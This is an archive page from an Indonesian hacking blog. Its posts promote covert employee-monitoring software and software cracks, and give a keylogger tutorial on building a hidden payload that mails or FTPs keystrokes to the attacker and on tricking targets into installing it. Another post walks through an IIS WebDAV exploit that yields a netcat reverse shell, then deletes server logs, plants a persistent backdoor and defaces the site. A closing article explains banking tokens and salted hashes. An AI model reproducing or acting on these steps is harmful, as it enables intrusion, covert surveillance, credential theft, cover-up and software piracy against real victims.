Tampilkan postingan dengan label hacker. Tampilkan semua postingan
Tampilkan postingan dengan label hacker. Tampilkan semua postingan

Senin, 07 Maret 2011

PROGRAM PENGINTAI

 untuk remote melalui web aku pake LogMeIn..masuk aja langsung ke http://www.logmein.com


Sebelumnya register dulu trus untuk yang For Personal Use klik aja produk kemudian klik LogMeIn Free.

ni link softnya

http://www.megaupload.com/?d=A1A9EUKI

kalau remote melalui LAN aku pake Network.LookOut.Net.Monitor.for.Employees.Professional.v4.3.1

untuk komputer admin pilih yang atas trus untuk yang client pilih yang bawah. untuk client supaya gak ketauan clik silent aja. kalau udah di instal buka programnya trus add komputer. password untuk add komputer harus sama dengan password ketika install software.

ne linknya

http://www.megaupload.com/?d=210UFG0K

atau juga menggunakan yg ini

NET SUPPORT MANAGER 10

fitur-fitur :

1. Fungsi akses desktop dibedakan : Watch ( cuman liat desktop client doang ), Share ( yang me-remote dan yang di remote dapat mengunakan Mouse+keyboard barengan ) dan Control ( Mouse+keyboad Client hanya bisa dipakai oleh Admin yang me-remote, user cuman bisa nonton doang. Cucok buat ngerjain user jahil yg suka make netcut ).

2. Tampilan bisa Full Screen ataupun Window dan bisa Scale to Fit Screen

3. Bisa mengambil gambar, video, suara, rekam, nguping sound di client, dll dari PC Client. Cucok buat nonton bareng kalo ada user yg buka situs xxx

4. Bisa digunakan untuk mengontrol atau untuk AUDIT inventory, baik hardware yang terpasang maupun software yang terinstall. (untuk maintenace pc client)

5. Bisa untuk melakukan Transfer File, baik untuk mengirim atau mengambil file dari Client. iseng buat liat isi flasdik user dan meng-copy nya (kalo ada file bagus :D)
6. Bisa untuk Chatting LOCAL dengan 1 Client maupun beberapa client sekaligus tanpa perlu Chat Server. Bagus buat godain n pdkt kalo ada user cantik

7. Bisa untuk melakukan Reboot, Log Out paksa, buat user bandel yg suka mainan ARP (snnifing)

screen sut :
[Image: 2_190975237l.jpg]

link donlod : 4share
sumber : http://anggabhandel009.blogspot.com

Sabtu, 05 Februari 2011

SOFWARE PENCARI SERIAL NUMBER DENGAN MUDAH

Jika
kita ingin mencari Serial number, crack ataupun keygen dari suatu
Software atau program biasanya kita mencari menggunakan Google ataupun
yahoo dengan mengggunakan kata kunci tertentu sehingga nantinya hasil
pencariannya akan diberikan Link website-website yang menyediakannya.
Ataupun dapat juga langsung mengunjungi website yang khusus menyediakan
hal tersebut seperti Astalavista.
tapi adakalanya jika kita langsung mengunjungi website-website tersebut
sering kali kita direpotkan oleh Spam, popup ataupun spyware yang
terdapat dalam website tersebut.

Jika ingin aman dan tidak
direpotkan oleh hal-hal semacam itu, kita bisa menggunakan suatu
software yang bisa mencari Serial number ataupun crack dari suatu
software tanpa kita harus masuk langsung ke website yang menyediakan
hal tersebut.

Nama Softwarenya adalah "CRAAGLE" yang merupakan
software ringan yang bisa digunakan untuk mencari serial number dan
Crack dari suatu software secara online dengan hanya mengetikkan nama
software yang akan kita cari pada kolom searchnya.


Gambaran umum dari software ini dapat dilihat dibawah ini :

Cara menggunakannya cukup mudah,


  • Download Softwarenya disini
  • Setelah
    didownload, Ekstrak kedalam komputer anda dan langsung jalankan program
    ini (tidak perlu proses instalasi) dengan mengklik file "Craagle.exe"
  • Pastikan koneksi internet anda sudah aktif
  • Ketikkan nama Software/program yang akan dicari pada kotak "Search" lengkap dengan Versinya contoh : Winzip 9.0
  • lalu tandai jenis pencariannya "Crack", "Serial" ataupun "Cover"
  • Klik Tombol "Search"
  • Biarkan software ini bekerja mencari yang anda inginkan
  • Jika telah selesai bekerja, hasil pencarian akan terlihat seperti gambar dibawah ini :

Untuk
serial number tinggal anda klik saja salah satu hasil pencariannya dan
akan terlihat isi serial numbernya pada kotak dibawahnya. Untuk crack
dan covers, pilih hasil pencarian yang ada, klik kanan dan pilih
Download.

Posting ini hanya sekedar tutorial untuk pengetahuan
belaka, jika terdapat penyalahgunaan dari software ataupun tutorial
ini, bukan merupakan tanggung jawab penulis.

Semoga berguna
sumber : http://anggabhandel009.blogspot.com

Kaspersky 2011 Crack Untuk Lisensi 3700 Hari

Dengan crack kaspersky 2011 ini anda dapat menggunakan Kaspersky Antivirus 2011 (KAV)dan kaspersky Internet Security 2011 (KIS) menjadi full version sampai dengan 3700 hari. Dan apapun produk kaspersky yang anda pergunakan saat ini seperti KAV 2011 atau KIS 2011 semuanya komputer Anda akan menjadi aman dari berbagai gangguan virus dan lain-lain. Disini anda tidak perlu untuk mengeluarkan uang sepeserpun alias gratis untuk mendapatkan sebuah kaspersky 2011 crack. Segera unduh dibawah ini dan pergunakan dengan sebaik-baiknya.



  • Free Download Kaspersky 2011 Crack

  • Kaspersky Crack Anti Black List

    Kaspersky Crack

    Bagi pecinta AntiVirus Kaspersky, pasti sedikit risih dengan anti virus Kaspersky ini, karena Key yang selalu ter-Black List setelah Update, saya sendiri sudah malas untuk meng-update key kaspersky, karena cepat sekali ter-black list.

    Untuk Kaspersky 2010 kebawah, kini sudah ada solusi dari masalah diatas yaitu dengan menggunakan crack AntiBlack List. Tetapi untuk Kaspersky 2011 belum dapat digunakan, jadi silakan menunggu dan gunakan key.

    Penggunaan Crack ini sangat mudah, silakan anda buka kaspersky terlebih dahulu, kemudian klik setting, maka akan muncul jendela seperti dibawah ini.

    Setting

    Kemudian klik option pada menu di sebelah kiri, kemudian pada kotak Enable Self Defense silakan anda hilangkan tanda ceklist-nya, klik ok. kemudian silakan anda exit Kaspersky anda dengan klik kanan pada icon di system tray pilih exit.

    Setelah kaspersky sudah tidak aktif, silakan anda jalankan "Kaspersky Blacklist Crack.exe" anda tinggal instal seperti biasa, jika sudah selesai, silakan anda jalankan kembali kaspersky, kemudian klik aktifkan dengan key yang saya berikan didalam satu folder AntiBlackList ini.

    Silakan anda update kaspersky anda, dan anda tidak perlu khawatir lagi untuk masalah key Black List..

    Baiklah untuk mendownload Kaspersky Blacklist Crack ini, silakan anda klik link download dibawah ini..

     Download Via Ziddu         Download Via UserShare

    Kaspersky 2011 Crack

    All Kaspersky 2011 Crack – Khusus untuk Kaspersky Anti Virus 2011 dan Kaspersky Internet Security 2011.Berhubung banyak yang request mengenai crack kaspersky 2011, maka kali ini saya memberikan crack tersebut. Setelah selesai download, silahkan di baca mengenai tutorial cara melakukannya.

    Download
    All Kaspersky 2011 Crack Installer
    No Pass Rar

    keylogger kirim data ke email

    Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking, hanya untuk berbagi pengalaman dan sharing.
    Pertama yang harus kalian lakukan adalah mendapatkan software yang bernama keylogger merupakan tool yang merekam semua aktifitas pada keyboard target komputer.
    Download softwarenya disini : http://www.ziddu.com/download/3170646/Perfect.Keylogger.v1.6.5.0.zip.html
    Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.
    Keterangan Langkah² Menjalankan Keylogger :
    1. Email penerima log attachment -> Ini di isi dengan email anda / email penerima hasil dari logging, misal: emailsaya@gmail.com
    2. SMTP Server -> Ini diisi dengan SMTP Server yang anda punya, misal: smtp.serversaya.net.id / smtp.indo.net.id
    3. Username SMPT server -> Ini diisi dengan username SMTP yang anda dapat dari username SMTP Server, misal: smtpsaya@serversaya.net.id / smtpsaya@indo.net.id
    4. Password SMPT server -> Password SMTP, di isi dengan password SMTP Anda :)
    Ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.
    Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.
    Terakhir adalah menyebarkan file .exe tersebut kepada komputer target terserah untuk menyebarkannya lakukan dengan cara kalian bagamana agar target mau melakukan install software yang sudah kalian compile. Ini cara hack yang bener benar terbukti.
    Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdeteksi oleh Anti virus. Software ini tidak gue complie jadi masih fresh.
    Artikel Posted By Yohan – Approved By BinusHacker Team
    Artikel Ini  Diupdate Oleh BinusHacker Team – Tambahan Cara Instlall Ardamax Keylogger Buat Kalian (^_^)

    1. Setelah menginstal program, ketika menjalankan untuk pertama kalinya akan diminta untuk memasukkan nama dan nomor serial key yang udah include didalam folder ketika di download. Silakan dilihat didalamnya.


    2. Setelah mengaktifkannya, langsung dibuka aja. Ketika Anda akan membukanya, Anda akan melihat icon ditambahkan ke dalam sistem tray. Langsung klik ajah.

    3511692621 cbd1d6bed1 Tutorial On Ardamax 3.0 Keyloggers
    3. Sekarang mari kita klik kanan pada ikon & lalu klik “Remote Installation”.

    4. Klik Next. Pada option “Additional components” pilih “Log viewer”.
    5. Next lanjut kepada “Invisibility” options. Centangin ajah semuanyabiar mantep Invisibilitynya.
    6. Next option “Security”, gak perlu sih, langsung NEXT lagi ajah.
    7. Next option “Web Update”, Jangan dicentangin semuanya / terserah sih maunya gimana, yg penting baca dulu perintah & maksudnya, kemudian klik NEXT.
    8. Kemudian akan muncul “Options” page.  Pilih seperti contoh dibawah ini.
    9. Cara dibawah ini harus dipastikan berjalan, klo gak jalan keyloggernya gak akan berhasil. Wajib diperhatikan!!
    Pilihlah sesuai dengan keinginan anda. Diharapkan anda menyeting dengan benar :)
    10. Isilah username & password FTP Account yang anda miliki. Seperti penjelasan sebelumnya di tahap awal cara setting FTP.
    11. Klik test, untuk melakukan test koneksi, apabila berhasil. Maka dipastikan keylogger anda berjalan dengan baik.
    12. Next ke “control” page, aturnya sesuai keinginan dah. Klo gak tau ya lewatin ajah.
    13. Next ke “Screen shot”, Klik Next ajah klo sudah tau artinya itu mah.
    14. Silakan pilih file untuk generate keylogger file.
    15. Selesai!
    16. Silakan gunakan dengan baik :)
    Catatan: Deactivate sementara anti virus anda, kadang ini terdeteksi sebagai admx virus / keylogger. Enjoy & Eat It!
    keylogger pengirim email lainnya download:

    Hacking Dengan IIS

    1) Pendahuluan
    Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
    2) Adanya Celah Keamanan
    Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
    Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
    Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
    Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
    Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
    Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
    3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
    Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
    D:\nc>nc -Lvp 6666
    Listening on [any] 6666 ….
    Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
    D:\vcproject\webdave\debug>web.exe
    [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
    www.coromputer.net && undernet #coromputer
    syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
    Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
    D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
    Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
    D:\nc>nc -Lvp 6666
    Listening on [any] 6666 ….
    connect to 200.200.200.200 from 123.123.123.123
    Microsoft(R) Windows 2000
    (C)Copyright Microsoft Corp 1981-2000.
    C:\winnt\system32>
    Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
    4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
    Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
    C:\winnt\system32> rmdir /s /q logfiles
    Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
    Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
    Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
    Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
    C:\inetpub\wwwroot> copy index.html indexold.html
    C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
    Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
    C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
    Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
    C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
    Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
    5) Kesimpulan
    Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
    Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

    Sabtu, 29 Januari 2011

    Cara Kerja Token Internet Banking

    Penggunaan token berupa alat kecil semacam kalkulator untuk mengamankan transaksi internet banking kini sudah menjadi hal yang wajib. Token ini menjadi faktor tambahan dalam otentikasi yaitu untuk membuktikan bahwa anda adalah benar-benar pengguna yang sah. Mungkin ada yang bertanya-tanya bagaimana cara kerja token seperti yang dipakai situs internet banking? Bagaimana alat kecil seperti kalkulator itu bisa menghasilkan angka yang juga diketahui oleh server internet banking, padahal alat itu tidak terbubung dengan server. Dalam artikel ini saya akan menjelaskan cara kerja token internet banking, dan dalam artikel berikutnya saya akan membuat token berbasis software dan website sederhana yang akan mensimulasikan internet banking.
    Authentication Method
    Otentikasi bertujuan untuk membuktikan siapa anda sebenarnya, apakah anda benar-benar orang yang anda klaim sebagai dia (who you claim to be). Ada banyak cara untuk membuktikan siapa anda. Metode otentikasi bisa dilihat dalam 3 kategori metode:
    1. Something You Know
    Ini adalah metode otentikasi yang paling umum. Cara ini mengandalkan kerahasiaan informasi, contohnya adalah password dan PIN. Cara ini berasumsi bahwa tidak ada seorangpun yang mengetahui rahasia itu kecuali anda seorang.
    2. Something You Have
    Cara ini biasanya merupakan faktor tambahan untuk membuat otentikasi menjadi lebih aman. Cara ini mengandalkan barang yang sifatnya unik contohnya adalah kartu magnetik/smartcard, hardware token, USB token dan sebagainya. Cara ini berasumsi bahwa tidak ada seorangpun yang memiliki barang tersebut kecuali anda seorang.
    3. Something You Are
    Ini adalah metode yang paling jarang diapakai karena faktor teknologi dan manusia juga. Cara ini mengandalkan keunikan bagian-bagian tubuh anda yang tidak mungkin ada pada orang lain seperti sidik jari, suara atau sidik retina. Cara ini berasumsi bahwa bagian tubuh anda seperti sidik jari dan sidik retina, tidak mungkin sama dengan orang lain.
    Lalu bagaimana dengan metode otentikasi tradisional seperti tanda tangan di atas materai? Masuk ke kategori manakah cara itu dari ketiga metode di atas? Saya pikir tidak ada yang cocok, karena itu saya tambahkan satu lagi yaitu “Something You Can“. Cara ini berasumsi bahwa tidak ada orang lain di dunia ini yang bisa melakukan itu selain anda. Memang otentikasi dengan tanda tangan dibangun di atas asumsi itu, tidak ada yang bisa menuliskan tanda tangan anda kecuali anda. Walaupun pada kenyataannya ada saja orang yang bisa meniru tanda tangan anda dengan sangat baik, namun walaupun menyadari fakta tersebut tanda tangan di atas kertas tetap diakui sebagai bukti otentik atas siapa anda.
    Two Factor Authentication
    Pada aplikasi yang kritis dan sensitif seperti transaksi keuangan, satu metode otentikasi saja tidak cukup. Oleh karena itu muncul istilah 2FA (Two Factor Authentication) yang merupakan sistem otentikasi yang menggunakan 2 faktor (metode) yang berbeda. Empat metode otentikasi yang sudah saya jelaskan sebelunya dapat dikombinasikan untuk meningkatkan keamanan, salah satu contohnya adalah dengan kombinasi “something you have” berupa kartu ATM dengan “something you know” berupa PIN. Kombinasi ini merupakan kombinasi yang paling banyak dipakai.
    Contoh kasus lain adalah ketika anda berbelanja di pasar modern dan membayar dengan kartu, tanpa disadari anda telah memakai lebih dari satu faktor otentikasi. Faktor yang pertama adalah “Something You Have” yaitu kartu debit/kredit anda. Faktor kedua adalah “Something You Know”, ketika anda diminta memasukkan PIN ke dalam mesin EDC. Bahkan mungkin ada faktor ketiga yaitu “Something You Can”, ketika anda diminta menanda-tangani nota pembayaran yang dicetak mesin EDC.
    Internet banking juga menggunakan two factor authentication dengan mengombinasikan “something you know” berupa password dan “something you have” berupa hardware token (keyBCA atau Token Mandiri).
    Password yang Dikeluarkan Token Internet Banking
    Pada umumnya ada dua mode pemakaian token internet banking:
    1. Mode Challenge/Response (C/R)
    Ini adalah mode yang paling sering dipakai ketika bertransaksi. Dalam mode ini server memberikan challenge berupa sederetan angka. Angka tersebut harus dimasukkan kedalam mesin token untuk mendapatkan jawaban (response). Kemudian pengguna memasukkan angka yang muncul pada tokennya ke dalam form di situs internet banking. Token akan mengeluarkan kode yang berbeda-beda walaupun dengan challenge code yang sama secara periodik tergantung waktu ketika challenge dimasukkan ke dalam token.
    2. Mode Self Generated (Response Only)
    Dalam mode ini server tidak memberikan tantangan (challenge) apapun. Token pengguna bisa langsung mengeluarkan sederetan angka tanpa harus memasukkan challenge. Seperti mode C/R, token juga mengeluarkan kode yang berbeda-beda secara periodik tergantung waktu ketika token diminta untuk menghasilkan kode self generated.
    Sebenarnya jawaban yang diberikan oleh token baik dalam mode C/R maupun Self Generated(resopnse only) tidak lain adalah password juga. Namun berbeda dengan password yang anda pakai untuk login, password yang dihasilkan token ini memiliki keterbatasan untuk alasan keamanan, yaitu:
    1. Hanya boleh dipakai 1 kali
    Ini disebut dengan OTP (One Time Password). Setelah suatu password dipakai, maka password yang sama tidak bisa lagi dipakai untuk kedua kalinya. Dengan cara ini tidak ada gunanya menyadap password yang dihasilkan token karena password tersebut tidak bisa dipakai lagi. Namun bila password tersebut di-intercept sehingga tidak pernah sampai ke server, maka password tersebut masih berharga karena di mata server, password itu belum pernah dipakai.
    2. Hanya boleh dipakai dalam rentang waktu yang terbatas
    Password yang dihasilkan token memiliki umur yang sangat terbatas, mungkin antara 3-6 menit bila umurnya habis maka password itu tidak bisa dipakai, walaupun belum pernah dipakai. Nanti akan saya jelaskan mengapa password token memerlukan umur, waktu merupakan unsur yang sangat kritikal dalam sistem ini.
    3. Hanya boleh dipakai dalam konteks sempit
    Bila password/PIN yang dipakai untuk login adalah password yang bebas konteks, dalam arti dengan berbekal password itu, anda bisa melakukan banyak hal, mulai dari melihat saldo, mengecek transaksi dan sebagainya. Namun password yang dihasilkan token, hanya bisa dipakai dalam konteks sempit, contohnya password yang dipakai untuk mengisi pulsa ke nomor 08123456789, tidak bisa dipakai untuk melakukan transfer dana.
    Terbatasnya konteks ini disebabkan karena untuk melakukan transaksi dibutuhkan password yang diikat oleh challenge dari server, sehingga password tersebut tidak bisa dipakai untuk transaksi lain yang membutuhkan challenge code yang berbeda. Contohnya bila challenge yang diberikan server adalah 3 digit terakhir dari nomor handphone (untuk transaksi isi pulsa), atau 3 digit terakhir nomor rekening tujuan (untuk transaksi transfer). Maka password yang dihasilkan token untuk transaksi isi pulsa ke nomor 0812555111222, akan valid juga untuk transaksi transfer uang ke rekening 155887723120222. Sebab kebetulan kedua transaksi tersebut membutuhkan password yang diikat oleh challenge code yang sama, yaitu 222 (diambil dari 3 digit terakhir).
    Konteks ini hanya berlaku bila password dihasilkan dalam mode C/R. Password yang dihasilkan dalam mode Self Generated, bisa dipakai dalam transaksi apa saja yang tidak meminta password dengan challenge code.
    Jadi bisa disimpulkan bahwa password yang dikeluarkan token bersifat:
    1. Selalu berubah-ubah secara periodik
    2. Memiliki umur yang singkat
    3. Hanya bisa dipakai 1 kali
    4. Terbagi dalam ada dua jenis, yaitu:
    * Password kontekstual yang terikat oleh challenge code dalam mode challenge/response.
    * Password bebas konteks yang dihasilkan dalam mode self generated.
    Proses Otentikasi
    Seperti password pada umumnya, syarat agar otentikasi berhasil adalah:
    password yang dikirimkan client = password yang disimpan di server
    Dengan alasan keamanan jarang sekali server menyimpan password user dalam bentuk plain-text. Biasanya server menyimpan password user dalam bentuk hash sehingga tidak bisa dikembalikan dalam bentuk plain-text. Jadi syarat otentikasi berhasil di atas bisa diartikan sebagai hasil penghitungan hash dari password yang dikirim klien harus sama dengan nilai hash yang disimpan dalam server. Perhatikan gambar di bawah ini untuk lebih memahami.
    courtesy of “www.unixwiz.net/techtips/iguide-crypto-hashes.html”
    courtesy of “www.unixwiz.net/techtips/iguide-crypto-hashes.html”
    Penggunaan Salt
    Untuk menghindari brute-force attack terhadap hash yang disimpan di server, maka sebelum password user dihitung nilai hashnya, terlebih dahulu ditambahkan string acak yang disebut dengan salt. Perhatikan contoh berikut, bila password user adalah “secret”, maka sebelum dihitung nilai hashnya, password ditambahkan dulu salt berupa string acak “81090273″ sehingga yang dihitung nilai hashnya adalah “secret81090273″ bukan “secret”.
    Perhatikan bahwa nilai MD5(“secret81090273″) adalah 894240dbe3d2b546c05a1a8e9e0df1bc sedangkan nilai MD5(“secret”) adalah 5ebe2294ecd0e0f08eab7690d2a6ee69. Bila tanpa menggunakan salt, maka attacker yang mendapatkan nilai hash 5ebe2294ecd0e0f08eab7690d2a6ee69 bisa menggunakan teknik brute force attack atau rainbow table untuk mendapatkan nilai password dalam plain-text. Salah satu contoh database MD5 online yang bisa dipakai untuk crack md5 adalah http://gdataonline.com/seekhash.php . Dalam situs tersebut coba masukkan nilai 5ebe2294ecd0e0f08eab7690d2a6ee69, maka situs tersebut akan memberikan hasil “secret”. Hal ini disebabkan karena situs tersebut telah menyimpan pemetaan informasi secret<=>5ebe2294ecd0e0f08eab7690d2a6ee69.
    Penambahan salt “81090273″ membuat nilai hash menjadi 894240dbe3d2b546c05a1a8e9e0df1bc. Bila nilai ini dimasukkan dalam situs tersebut, dijamin tidak akan ada dalam databasenya bahwa nilai hash tersebut adalah “secret81090273″. Dan karena nilai salt ini dibangkitkan secara random, maka tiap user memiliki nilai salt yang berbeda sehingga tidak mungkin attacker bisa membangun database pemetaan antara plaintext dan hash secara lengkap.
    Dengan penggunaan salt, maka database pengguna dalam server akan tampak seperti ini:
    Username Salt Password Hash
    budi 81090273 894240dbe3d2b546c05a1a8e9e0df1bc
    Field salt diperlukan ketika melakukan otentikasi. Password yang dikirimkan user akan ditambahkan dulu dengan nilai salt ini baru kemudian dihitung nilai hashnya. Nilai hash hasil perhitungan tersebut akan dibandingkan dengan field Password Hash yang ada di kolom sebelahnya. Bila sama, maka otentikasi berhasil, bila tidak sama, berarti otentikasi gagal. Secara prinsip sama saja dengan gambar di atas, hanya ditambahkan satu langkah yaitu penambahan salt sebelum dihitung nilai hashnya.
    Pembangkitan One Time Password (OTP) Token Internet Banking
    Apa yang saya jelaskan sebelumnya menjadi dasar dari apa yang akan saya jelaskan berikut ini. Bagaimana cara token menghasilkan sederetan angka sebagai OTP yang bisa diotentikasi oleh server? Ingat bahwa syarat agar otentikasi berhasil adalah password yang dikirim klien harus sama dengan yang disimpan di server. Ingat juga bahwa password yang dihasilkan token selalu berubah-ubah secara periodik. Bagaimana apa yang dihasilkan alat itu bisa sinkron dengan server? Padahal alat tersebut tidak terhubung dengan server, bagaimana server bisa tahu berapa nilai yang dihasilkan token? Jawabannya adalah dengan waktu. Sebelumnya sudah saya sebutkan bahwa waktu adalah elemen yang sangat penting dalam sistem ini. Server dan token dapat sinkron dengan menggunakan waktu sebagai nilai acuan.
    OTP dalam Mode Self Generated (Response Only)
